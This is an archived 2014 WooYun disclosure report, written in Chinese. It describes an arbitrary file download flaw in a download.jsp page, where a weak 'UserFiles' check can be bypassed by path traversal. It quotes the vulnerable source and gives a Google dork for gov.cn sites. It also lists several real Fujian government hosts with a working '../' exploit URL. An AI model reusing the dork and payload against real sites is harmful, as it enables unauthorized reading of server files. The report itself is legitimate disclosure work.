乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-19: 细节已通知厂商并且等待厂商处理中 2014-02-24: 厂商已经确认,细节仅向厂商公开 2014-02-27: 细节向第三方安全合作伙伴开放 2014-04-20: 细节向核心白帽子及相关领域专家公开 2014-04-30: 细节向普通白帽子公开 2014-05-10: 细节向实习白帽子公开 2014-05-20: 细节向公众公开
任意文件下载0.0
1.漏洞出现在download.jsp中源码分析一下:
<%@page language="java" contentType="application/x-msdownload" import="java.io.*,java.net.*" pageEncoding="gb2312"%><% String temp=request.getParameter("path");if(temp.indexOf("UserFiles")==-1){ //此处仅判断url中是否存在UserFiles关键字 out.println("非法下载路径!"); return;}String path=temp;//new String(temp.getBytes("8859_1"),"gb2312"); //temp路径未做处理直接赋值给path,并用于下面的文件读取response.reset();response.setContentType("application/x-download");String filenamedownload = path;String filenamedisplay = path.substring(path.lastIndexOf("/")+1,path.length());filenamedisplay = URLEncoder.encode(filenamedisplay,"UTF-8"); response.addHeader("Content-Disposition","attachment;filename=" + filenamedisplay); OutputStream output = null; FileInputStream fis = null; try { output = response.getOutputStream(); filenamedownload=request.getSession().getServletContext().getRealPath("/")+filenamedownload; System.out.println("filenamedownload:"+filenamedownload); File file=new File(filenamedownload); if (!file.exists()){ out.println("对不起,文件已删除"); return; } fis = new FileInputStream(filenamedownload);//所以问题就出现了 byte[] b = new byte[1024]; int i = 0; while((i = fis.read(b)) > 0) { output.write(b, 0, i); } output.flush(); } ………………%>
有的版本是这个样子:
if(st != null && st.length > 0){ if(!"UserFiles".equals(st[0])){ out.println("文件不存在"); return; } }if(temp==null) temp="";String path=new String(temp.getBytes("8859_1"),"gb2312");response.reset();String filenamedownload = path;String filenamedisplay = path.substring(path.lastIndexOf("/")+1,path.length());//"系统解决方案.doc";//系统解决方案.txt filenamedisplay = URLEncoder.encode(filenamedisplay,"UTF-8"); response.addHeader("Content-Disposition","attachment;filename=" + filenamedisplay); OutputStream output = null; FileInputStream fis = null;
其实基本一样了...2.google dork:来看看是否通用
site:gov.cn inurl:download.jsp?path=/UserFiles/
获得约 2,590 条结果
3.以其中一个站点测试:
jjcx.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
4.提供站点方便验证以及体现其通用性:
jjcx.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jspwww.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jspcrj.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jspqz.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jspwww.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jspfz.fjhi.gov.cn/site/fuzhou/bin//download.jsp?path=UserFiles/../download.jspxxgk.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
麻烦通知修复吧
危害等级:高
漏洞Rank:18
确认时间:2014-02-24 09:18
对于所述下载功能页面引起的文件包含,是较为常见的,根据后续实例抽测,暂不能认定2590条结果是否为同一CMS或同一开发方(部分功能代码同源情况也比较多)。已经将涉及的福建省网站案例,转由CNCERT下发给福建分中心处置(此前已经有白帽子报送过两至三例)。
暂无